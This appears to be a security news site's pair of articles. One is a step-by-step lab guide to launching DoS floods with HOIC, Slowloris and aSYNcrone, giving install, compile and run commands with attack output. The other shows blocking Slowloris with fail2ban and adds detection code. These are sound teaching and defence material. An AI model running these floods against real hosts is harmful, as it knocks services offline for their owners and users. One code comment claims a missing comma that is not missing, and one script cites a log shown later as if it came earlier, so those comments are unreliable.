Information Security Newspaper | Hacking News (https://www.securitynewspaper.com), category: DDoS Tools

TOP DOS (Denial of Service) TOOLS – STEP BY STEP GUIDE
https://www.securitynewspaper.com/2019/12/18/top-dos-denial-of-service-tools-step-by-step-guide/
Wed, 18 Dec 2019 15:51:58 +0000

DOS (Denial of Service) is a very common attack in every scenario: it slows down a machine or IP address by continuously throwing traffic at it. DOS is still used by many attackers, as it takes little effort to take an IP address down. As per an Ethical Hacking researcher of the International Institute of Cyber Security, “there are many vulnerabilities out there which may lead to a DOS attack”.

We will show you the popular tools used in DOS attacks.

NOTE: Do not run these tests on production systems; this is for informational and educational purposes only.

HOIC (High Orbit ION Cannon)

HOIC is the newer version of LOIC (Low Orbit Ion Cannon), which is used for attacking web applications. LOIC sometimes becomes unstable, whereas HOIC worked fine when we tested it on Windows 7. The user only has to enter the IP address and select the number of threads; the thread count determines how many data packets the user wants to flood the target with. This tool can sometimes cause severe damage.


  • We tested this tool on Windows 7 32 bit, build version 7601, hardware specs i5 7200 CPU 2.71 GHz (Attacker – 10.10.11.17). If the user sets too high a thread value, HOIC closes automatically.

Attacker – 10.10.11.17 =============== Victim – 10.10.11.145

Screenshot: HOIC (High Orbit Ion Cannon)
  • Below is the other machine, Windows 7 64 bit build 7600 (Victim – 10.10.11.145). To check the bandwidth usage we used BitMeter OS.
  • Download BitMeter OS : https://codebox.net/pages/bitmeteros-downloads
  • Before the DOS, we can see that the victim's CPU and resources were working normally.
Screenshot: victim machine before starting the attack with HOIC
  • After running the DOS with HOIC, we can see the resource utilization of the victim machine.
Screenshot: BitMeter OS on the victim machine after attacking with HOIC
  • The above shows high bandwidth on the target machine, which makes the RAM and CPU unresponsive as all resources are consumed by the high volume of traffic.
  • You can also check the Ethernet statistics using netstat. Open CMD as administrator and type netstat -e.
  • Before: interface statistics.
Screenshot: Ethernet statistics before the attack
  • After starting the attack, the interface stats increase because of the high traffic.
Screenshot: Ethernet statistics after the attack
  • The above Ethernet stats show that the bandwidth has increased. You can run netstat -e in the same way to check the interface statistics on the attacking machine.

Slowloris

Slowloris is another popular DOS tool: slow but effective. It is designed to send HTTP requests to a server; the web server gets flooded with GET requests and its resources are exhausted handling them. Here we will send the requests to a local computer. Slowloris does not have a heavy impact on the computer itself; it just sends a large number of packets to the designated IP address.

  • For attacking we will use Kali Linux 2018.4 amd64.
  • On the victim side we will use Windows 7 32 bit, build version 7600, hardware specs i5 7200 CPU 2.71 GHz.
  • For checking, we started Wireshark on the victim machine beforehand.
  • To use slowloris, Python must be installed.
  • To install slowloris, type sudo apt-get update
  • Then type sudo apt-get install python
  • Type git clone https://github.com/gkbrk/slowloris.git
  • Type cd slowloris and then type chmod u+x setup.py
  • Type python setup.py install
  • Type python slowloris.py <target IP address>
root@kali:/home/iicybersecurity/slowloris# python slowloris.py 10.10.11.123
 [18-12-2019 00:18:22] Attacking 10.10.11.123 with 150 sockets.
 [18-12-2019 00:18:22] Creating sockets…
 [18-12-2019 00:18:22] Sending keep-alive headers… Socket count: 31
 [18-12-2019 00:18:37] Sending keep-alive headers… Socket count: 1
 [18-12-2019 00:18:52] Sending keep-alive headers… Socket count: 7
 [18-12-2019 00:19:07] Sending keep-alive headers… Socket count: 1
 [18-12-2019 00:19:22] Sending keep-alive headers… Socket count: 0
 [18-12-2019 00:19:37] Sending keep-alive headers… Socket count: 2
 [18-12-2019 00:19:52] Sending keep-alive headers… Socket count: 4
 [18-12-2019 00:20:07] Sending keep-alive headers… Socket count: 6
 [18-12-2019 00:20:22] Sending keep-alive headers… Socket count: 6
 [18-12-2019 00:20:37] Sending keep-alive headers… Socket count: 1
 [18-12-2019 00:20:52] Sending keep-alive headers… Socket count: 1
  • After executing the above command, Slowloris starts sending data packets to the target IP address.
  • We had already configured Wireshark to analyze the local network.
  • Below shows the high traffic being received on the victim machine.
Screenshot: Wireshark capture on the victim machine
  • The screenshot above shows that Wireshark captured the incoming data packets. Slowloris does not make much impact on the target machine.
  • Slowloris can easily be blocked by the target machine. Slowloris is also found in other variants.
  • Below is the list of user agents that Slowloris uses when sending requests to the web server.
list_of_sockets = []
user_agents = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    # a trailing comma was missing here; without it Python silently concatenates this string with the next one
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
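A defender-side check for the socket-holding behaviour visible in the Slowloris log above ("Socket count: 150"), added here as an example and not code from the original post or from the slowloris project: it parses a netstat-style TCP table taken on the web server and flags any remote address holding an unusually large number of concurrent connections to the web port. The snapshot, the IP addresses and the threshold are constructed assumptions.

```python
from collections import Counter

# Port of the web server under observation (the page's runs target port 80).
WEB_PORT = 80
# Alert when one remote address holds at least this many concurrent
# connections; the value is an assumption chosen for this example.
CONN_THRESHOLD = 100

# Constructed netstat-style snapshot (not captured from the page's machines):
# proto  recv-q  send-q  local-address  remote-address  state
# One host holds 150 connections to port 80, the socket count the slowloris
# log above reports; an ordinary browser client holds one or two.
SAMPLE_NETSTAT = "\n".join(
    ["tcp 0 0 10.10.11.123:80 10.10.11.200:%d ESTABLISHED" % (40000 + i)
     for i in range(150)]
    + [
        "tcp 0 0 10.10.11.123:80 10.10.11.50:52001 ESTABLISHED",
        "tcp 0 0 10.10.11.123:80 10.10.11.50:52002 TIME_WAIT",
        "tcp 0 0 10.10.11.123:22 10.10.11.60:33001 ESTABLISHED",
        "udp 0 0 10.10.11.123:53 0.0.0.0:*",
    ]
)


def parse_connections(text):
    """Yield (local_port, remote_ip, state) for every TCP line of a
    netstat/ss style table; non-TCP and malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] != "tcp":
            continue
        local, remote, state = parts[3], parts[4], parts[5]
        local_port = int(local.rsplit(":", 1)[1])
        remote_ip = remote.rsplit(":", 1)[0]
        yield local_port, remote_ip, state


def connections_per_source(text, port=WEB_PORT):
    """Count ESTABLISHED connections to `port`, grouped by remote IP."""
    counts = Counter()
    for local_port, remote_ip, state in parse_connections(text):
        if local_port == port and state == "ESTABLISHED":
            counts[remote_ip] += 1
    return dict(counts)


def suspicious_sources(text, port=WEB_PORT, threshold=CONN_THRESHOLD):
    """Remote IPs holding `threshold` or more connections to `port`."""
    counts = connections_per_source(text, port)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for ip, n in sorted(connections_per_source(SAMPLE_NETSTAT).items()):
        print(f"{ip:15} {n:4d} connections to port {WEB_PORT}")
    print("suspicious:", suspicious_sources(SAMPLE_NETSTAT))
```

On a real host the same functions can be fed the output of netstat -an (or ss -tn on Linux) instead of the constructed snapshot.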

aSYNcrone

aSYNcrone is another tool used in DOS attacks. It sends SYN packets to the target IP address or web server, which consumes the target web server's resources and makes it unresponsive. It sends the packets efficiently. aSYNcrone is written in C.

  • For testing we used Ubuntu 18.04.
  • On the victim side we will use Windows 7 32 bit, build version 7601, hardware specs i5 7200 CPU 2.71 GHz.
  • Open a terminal and type git clone https://github.com/fatih4842/aSYNcrone.git
root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/fatih4842/aSYNcrone.git
 Cloning into 'aSYNcrone'…
 remote: Enumerating objects: 24, done.
 remote: Counting objects: 100% (24/24), done.
 remote: Compressing objects: 100% (21/21), done.
 remote: Total 24 (delta 6), reused 11 (delta 2), pack-reused 0
 Unpacking objects: 100% (24/24), done.
  • Type cd aSYNcrone
  • Type gcc aSYNcrone.c -o aSYNcrone -lpthread
root@ubuntu:/home/iicybersecurity/Downloads# cd aSYNcrone/
root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# ls
 aSYNcrone.c  README.md  src
root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# gcc aSYNcrone.c -o aSYNcrone -lpthread
 aSYNcrone.c: In function ‘bilgi’:
 aSYNcrone.c:158:20: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘long unsigned int’ [-Wformat=]
              printf("\n\nNumber of PACKETS: "YSL"%d"RESET" \t Attack Time: "YSL"%.2f"RESET" second \n\n"RESET, p_sayi, zaman_farki);
                     ^~~~~~~~~
 aSYNcrone.c:158:50: note: format string is defined here
              printf("\n\nNumber of PACKETS: "YSL"%d"RESET" \t Attack Time: "YSL"%.2f"RESET" second \n\n"RESET, p_sayi, zaman_farki);
                                                  ~^
                                                  %ld
  • Then type ./aSYNcrone 80 10.10.11.145 21 1000
root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# ./aSYNcrone 80 10.10.11.145 21 1000

[+] IP_HDRINCL success!
 [+] Attack has been started!

 Number of PACKETS: 7624174       Attack Time: 148.00 second
  • Below shows that the bandwidth and CPU usage were normal before the attack.
Screenshot: victim machine before attacking with aSYNcrone
  • The above shows that the attack has started; you can see a sharp increase in victim resource usage in BitMeter OS. According to an Ethical Hacking researcher of the International Institute of Cyber Security, these tools are enhanced by hackers to cause more impact, but there are many ways to prevent DOS attacks.
Screenshot: BitMeter OS and Task Manager on the victim machine after attacking with aSYNcrone
  • The above shows the high bandwidth and high CPU and RAM usage of the target computer.

DOS Prevention – Step by step guide
https://www.securitynewspaper.com/2019/11/13/dos-prevention-step-by-step-guide/
Thu, 14 Nov 2019 01:46:38 +0000

DOS is the most common attack used by many attackers. DOS (Denial of Service) attacks flood the bandwidth with data packets to interrupt the services of a victim IP address or URL. Ethical Hacking researchers of the International Institute of Cyber Security simulated a DOS attack and demonstrated how to block an IP address while a DOS attack is occurring.

Fail2Ban is used to block suspicious IP addresses that send multiple requests to the server IP address. Fail2ban scans the log files and blocks IP addresses that have made too many login attempts; it updates the firewall policy to deny new connections from the suspicious IP addresses.

Kali Linux – 192.168.1.9
Ubuntu – 192.168.1.8

DOS Attack From Ubuntu OS

  • Here we will run a DOS attack using slowloris. Slowloris is a very common tool used in DOS attacks.
  • Open a terminal on the Ubuntu machine (Attacker)
    • Type sudo apt-get update
    • Type sudo apt-get install python3
    • Type sudo apt-get install python3-pip
  • Type pip3 --version
root@ubuntu:/home/iicybersecurity# pip3 --version
 pip 9.0.1 from /usr/lib/python3/dist-packages (python 3.6)
  • Type pip3 install slowloris
root@ubuntu:/home/iicybersecurity# pip3 install slowloris
 Collecting slowloris
   Downloading https://files.pythonhosted.org/packages/a6/37/5ae3d027727122039f52a22d278f1d73f564e03e5fdb93f10e3a2f26aa06/Slowloris-0.2.0.tar.gz
 Building wheels for collected packages: slowloris
   Running setup.py bdist_wheel for slowloris … done
   Stored in directory: /root/.cache/pip/wheels/bd/a1/f1/35dd5184db4e890b6ff5c992ff1f7a1b8b30e9bcd89aa6f7ba
 Successfully built slowloris
 Installing collected packages: slowloris
 Successfully installed slowloris-0.2.0
  • Type slowloris --help
root@ubuntu:/home/iicybersecurity# slowloris --help
 usage: slowloris [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x]
                  [--proxy-host PROXY_HOST] [--proxy-port PROXY_PORT] [--https]
                  [--sleeptime SLEEPTIME]
                  [host]
 Slowloris, low bandwidth stress test tool for websites
 positional arguments:
   host                  Host to perform stress test on
 optional arguments:
   -h, --help            show this help message and exit
   -p PORT, --port PORT  Port of webserver, usually 80
   -s SOCKETS, --sockets SOCKETS
                         Number of sockets to use in the test
   -v, --verbose         Increases logging
   -ua, --randuseragents
                         Randomizes user-agents with each request
   -x, --useproxy        Use a SOCKS5 proxy for connecting
   --proxy-host PROXY_HOST
                         SOCKS5 proxy host
   --proxy-port PROXY_PORT
                         SOCKS5 proxy port
   --https               Use HTTPS for the requests
   --sleeptime SLEEPTIME
                         Time to sleep between each header sent.
  • Type slowloris 192.168.1.9; this command starts a normal DOS attack on the victim machine (the Kali machine).
Screenshot: Wireshark on the victim machine – 192.168.1.9
  • The Wireshark screenshot above shows the TCP packets being received, as the victim is running the apache2 service. By default slowloris sends its packets to port 80.
  • The above is a very simple scenario showing how a DOS attack is simulated. To defend against such DOS attacks, we will use fail2ban.

Victim/ Defender Machine – Kali OS

Fail2Ban Installation

  • We will be testing on Linux distros: Ubuntu 18.04 for attacking and Kali Linux as the victim/defender.
  • Kali Linux (Victim & Defender) – 192.168.1.9
  • Ubuntu (Attacker) – 192.168.1.8
  • For installation on Kali Linux, open a terminal
    • Type sudo apt-get update
    • Type sudo apt-get install fail2ban
  • Type sudo service apache2 start
  • Type sudo systemctl status apache2
root@kali:/etc/fail2ban# sudo systemctl status apache2
 ● apache2.service - The Apache HTTP Server
    Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
    Active: active (running) since Tue 2019-11-05 02:09:37 EST; 2h 47min ago
   Process: 4749 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
  Main PID: 4753 (/usr/sbin/apach)
     Tasks: 152 (limit: 4662)
    Memory: 91.3M
    CGroup: /system.slice/apache2.service
            ├─4753 /usr/sbin/apache2 -k start
            ├─4754 /usr/sbin/apache2 -k start
            ├─6073 /usr/sbin/apache2 -k start
            ├─6074 /usr/sbin/apache2 -k start
            ├─6075 /usr/sbin/apache2 -k start
            ├─6077 /usr/sbin/apache2 -k start
            ├─6079 /usr/sbin/apache2 -k start
            ├─6080 /usr/sbin/apache2 -k start
            ├─6081 /usr/sbin/apache2 -k start
            ├─6083 /usr/sbin/apache2 -k start
            ├─6084 /usr/sbin/apache2 -k start
            ├─6085 /usr/sbin/apache2 -k start
            ├─6086 /usr/sbin/apache2 -k start
            ├─6087 /usr/sbin/apache2 -k start
            ├─6088 /usr/sbin/apache2 -k start
            ├─6089 /usr/sbin/apache2 -k start
            ├─6090 /usr/sbin/apache2 -k start
            ├─6091 /usr/sbin/apache2 -k start
            ├─6092 /usr/sbin/apache2 -k start
            ├─6093 /usr/sbin/apache2 -k start
            ├─6094 /usr/sbin/apache2 -k start
  • Press Ctrl+c
  • Before starting the fail2ban service, we have to configure it. For that:
    • Type cd /etc/fail2ban
    • Type nano jail.conf
  • Here change
    • bantime = 30
    • findtime = 50
    • maxretry = 10
  • Then enter enabled = true under [apache-auth], [apache-badbots], [apache-noscript] & [apache-overflows], as shown below.
#ignorecommand = /path/to/command
ignorecommand =

# "bantime" is the number of seconds that a host is banned.
bantime  = 30

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 50

# "maxretry" is the number of failures before a host get banned.
maxretry = 10

#
# HTTP servers
#

[apache-auth]
enabled  = true
port     = http,https
logpath  = %(apache_error_log)s

[apache-badbots]
# Ban hosts which agent identifies spammer robots crawling the web
# for email addresses. The mail outputs are buffered.
enabled  = true
port     = http,https
logpath  = %(apache_access_log)s
bantime  = 48h
maxretry = 1

[apache-noscript]
enabled  = true
port     = http,https
logpath  = %(apache_error_log)s

[apache-overflows]
enabled  = true
port     = http,https
logpath  = %(apache_error_log)s
maxretry = 2
  • Type sudo nano /etc/fail2ban/jail.local and copy the text below. You can also change maxretry and findtime under the [apache] section.
[apache]
enabled  = true
port     = http,https
filter   = apache-auth
logpath  = /var/log/apache2/*error.log
maxretry = 2
findtime = 50
ignoreip =
  • Type sudo /etc/init.d/fail2ban start
root@kali:/etc/fail2ban# sudo /etc/init.d/fail2ban start
 [ ok ] Starting fail2ban (via systemctl): fail2ban.service.
 root@kali:/etc/fail2ban#
  • Save the file and type sudo systemctl status fail2ban.service
root@kali:/etc/fail2ban# sudo systemctl status fail2ban.service
 ● fail2ban.service - Fail2Ban Service
    Loaded: loaded (/lib/systemd/system/fail2ban.service; disabled; vendor preset: disabled)
    Active: active (running) since Tue 2019-11-05 05:02:20 EST; 3s ago
      Docs: man:fail2ban(1)
   Process: 6475 ExecStartPre=/bin/mkdir -p /var/run/fail2ban (code=exited, status=0/SUCCESS)
  Main PID: 6476 (fail2ban-server)
     Tasks: 13 (limit: 4662)
    Memory: 17.9M
    CGroup: /system.slice/fail2ban.service
            └─6476 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
 Nov 05 05:02:20 kali systemd[1]: Starting Fail2Ban Service…
 Nov 05 05:02:20 kali systemd[1]: Started Fail2Ban Service.
 Nov 05 05:02:21 kali fail2ban-server[6476]: Server ready

Attacker Machine – Ubuntu OS

  • Type slowloris 192.168.1.9 -p 80 and slowloris will start sending packets to the target IP address.
  • 192.168.1.9 is the target IP address.
  • -p specifies the port number; using port 80, it will generate the traffic.
root@ubuntu:/home/iicybersecurity# slowloris 192.168.1.9 -p 80
 [05-11-2019 02:08:59] Attacking 192.168.1.9 with 150 sockets.
 [05-11-2019 02:08:59] Creating sockets…
 [05-11-2019 02:08:59] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:14] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:29] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:44] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:59] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:10:14] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:10:29] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:10:44] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:00] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:15] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:30] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:45] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:12:00] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:12:15] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:12:30] Sending keep-alive headers… Socket count: 150

Victim/ Defender Machine

  • Now go to the victim machine, Kali Linux. In Wireshark you will notice the DOS from the attacker machine to the target IP address.
  • Type sudo fail2ban-client set apache banip 192.168.1.8
  • This command blocks the attacker IP address. The screenshot below shows that 192.168.1.8 has been blocked.
Screenshot: Wireshark after the attacker IP was blocked using fail2ban
  • The screenshot above shows that no more packets are being received from the attacker machine.
  • Now if you check the fail2ban status, you will notice that the attacker IP has been blocked because the attacker was sending multiple packets.
  • To check the status, open another terminal and type sudo fail2ban-client status apache
root@kali:/var/log/apache2# sudo fail2ban-client status apache
 Status for the jail: apache
 |- Filter
 |  |- Currently failed: 0
 |  |- Total failed:     1
 |  `- File list:        /var/log/apache2/error.log
 `- Actions
    |- Currently banned: 1
    |- Total banned:     1
    `- Banned IP list:   192.168.1.8
  • The status above shows that the attacker machine (Ubuntu), 192.168.1.8, is now blocked.
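To make the meaning of bantime, findtime and maxretry concrete, here is an added model of the jail logic (an example written for this page, not fail2ban's own code) that replays Apache error-log lines through the same sliding window with the values from the jail.local above (maxretry = 2, findtime = 50, bantime = 30). The log lines, timestamps and client IP addresses are constructed, and the failure test is a simplified stand-in for the apache-auth failregex.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Jail values from the page's jail.local / jail.conf edits.
MAXRETRY = 2   # failures needed before a host is banned
FINDTIME = 50  # seconds in which those failures must occur
BANTIME = 30   # seconds the ban lasts

# Apache 2.4 error-log line shape that the apache-auth filter reads.
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[[^\]]*\] (?:\[pid [^\]]*\] )?"
    r"\[client (?P<ip>[\d.]+)(?::\d+)?\] (?P<msg>.*)$"
)
TS_FMT = "%a %b %d %H:%M:%S.%f %Y"

# Constructed sample log (not taken from the page's machines): 192.168.1.8
# fails twice 19 s apart, 192.168.1.20 fails twice 65 s apart.
SAMPLE_LOG = """\
[Tue Nov 05 05:03:01.000000 2019] [auth_basic:error] [pid 6080] [client 192.168.1.8:51002] AH01617: user admin: authentication failure for "/admin": Password Mismatch
[Tue Nov 05 05:03:20.000000 2019] [auth_basic:error] [pid 6081] [client 192.168.1.8:51003] AH01617: user admin: authentication failure for "/admin": Password Mismatch
[Tue Nov 05 05:03:25.000000 2019] [auth_basic:error] [pid 6083] [client 192.168.1.20:40001] AH01617: user bob: authentication failure for "/admin": Password Mismatch
[Tue Nov 05 05:04:30.000000 2019] [auth_basic:error] [pid 6084] [client 192.168.1.20:40002] AH01617: user bob: authentication failure for "/admin": Password Mismatch
[Tue Nov 05 05:04:31.000000 2019] [auth_basic:error] [pid 6085] [client 192.168.1.8:51004] AH01617: user admin: authentication failure for "/admin": Password Mismatch
"""


def parse_line(line):
    """Return (timestamp, client_ip, message) or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group("ts"), TS_FMT), m.group("ip"), m.group("msg")


def is_auth_failure(msg):
    # Simplified stand-in for the apache-auth failregex (assumption).
    return "authentication failure" in msg or "user not found" in msg


def run_jail(log_text, maxretry=MAXRETRY, findtime=FINDTIME, bantime=BANTIME):
    """Replay the log through fail2ban-style findtime/maxretry/bantime logic.
    Returns (bans, ban_until, total_failed): bans lists (ip, ban_start),
    ban_until maps ip -> expiry, total_failed counts matched failures."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside findtime
    ban_until = {}                # ip -> datetime when the ban expires
    bans, total_failed = [], defaultdict(int)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, msg = parsed
        if not is_auth_failure(msg):
            continue
        total_failed[ip] += 1
        if ip in ban_until and ts < ban_until[ip]:
            continue                      # already banned, nothing to do
        window = recent[ip]
        while window and (ts - window[0]).total_seconds() > findtime:
            window.popleft()              # drop failures older than findtime
        window.append(ts)
        if len(window) >= maxretry:
            ban_until[ip] = ts + timedelta(seconds=bantime)
            bans.append((ip, ts))
            window.clear()                # counting starts afresh after a ban
    return bans, ban_until, dict(total_failed)


if __name__ == "__main__":
    bans, ban_until, totals = run_jail(SAMPLE_LOG)
    for ip, start in bans:
        print(f"banned {ip} at {start:%H:%M:%S} until {ban_until[ip]:%H:%M:%S}")
    print("total failed:", totals)
```

Only 192.168.1.8 gets banned: its two failures fall inside one 50-second findtime window, while 192.168.1.20's are 65 seconds apart, so the first has already aged out of the window when the second arrives.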
